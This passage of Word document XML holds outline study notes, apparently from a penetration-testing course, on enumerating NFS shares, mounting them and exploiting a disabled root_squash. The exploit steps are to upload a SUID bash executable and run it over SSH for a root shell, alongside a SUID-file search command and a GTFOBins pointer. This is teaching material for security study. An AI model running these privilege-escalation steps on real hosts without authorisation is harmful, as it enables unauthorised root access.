    <w:p w14:paraId="7A630A33" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Takes parameters such as file handle, name of file, user ID, group ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448B2DDA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>What runs NFS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6AF09E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>NFS protocol, transfer files between OS types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639DB0DE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>4.2 version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33971BD3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Enumerating NFS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47134C10" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Critical when considering how to enumerate and exploit a remote machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A59D68E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>For advanced enumeration of NFS server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7388F022" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>NFS-Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67712D6E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Essential to have package installed on any machine that uses NFS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE8B025" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Contains showmount and mount.nfs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BA7DD2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Most useful for extracting information from NFS shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157996DE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Sudo apt install nfs-common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749D7140" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Port scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570EA3B4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Mounting NFS shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AB092E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Client system needs directory where all the content shared by the host server in the export folder can be accessed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278C0CEB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Created anywhere on system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D859BB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Use mkdir /tmp/mount (for temporary that will delete upon shutdown)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F723EB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Once created, use “mount” command to connect the NFS share to the mount point on machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24299EB4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ex. Sudo mount -t nfs &lt;ip&gt;:share /tmp/mount/ -nolock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBA18EF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Sudo – root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5B8158" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Mount – execute mount command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7E0096" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>-t nfs – type of device to mount, then specifying its NFS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE93861" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>&lt;ip&gt;:share – the IP address of the NFS server and the name of the share we wish to mount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0424E2CB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>-nolock – specifies not to use NLM locking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161D3B79" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>/usr/sbin/showmount -e &lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7F4D7F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Lists NFS shares that are visible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CCF85A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>After using nmap to confirm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526047DF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Use this in the “share” portion in the sudo mount command above</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B2122D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Refresh directory by going back to home directory (or directory listed in NSF share) and reentering PATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14701753" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Exploiting NFS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3B8FDD" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>If a low privilege shell is on a machine with NFS share, it can potentially be used to escalate privileges – depending on configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270ADA6B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Root_squash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6669F922" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Enabled by default – prevents anyone connecting to NFS share from having root access to the NFS volume</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A878B62" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Remote root users are assigned a user “nsfnobody” – least local privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFAF603" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>If turned off, allows creation of SUID bit files, allowing remote root access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BC888A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>SUID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CED97E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Files with SUID bit set can be run with the permissions of the file owner/group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7A9BED" w14:textId="0B9E8EED" w:rsidR="00DC7D6C" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Super-user – leverage to get shell with these privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDDC375" w14:textId="6754E27E" w:rsidR="005C68F7" w:rsidRDefault="005C68F7" w:rsidP="005C68F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>find / -perm +6000 2&gt;/dev/null | grep ‘/bin/’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E81EFFD" w14:textId="4AA8A136" w:rsidR="005C68F7" w:rsidRPr="00F512ED" w:rsidRDefault="005C68F7" w:rsidP="005C68F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>copy path and check GTFOBins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BCB52E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177F76A3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Upload files to NFS share and control permissions of these files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF7054A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Set permissions of upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12929298" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Bash shell executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0E993A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Login through SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77190EE6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Execute bash exe to gain root shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175D7CAD" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>The Executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7884BAB5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
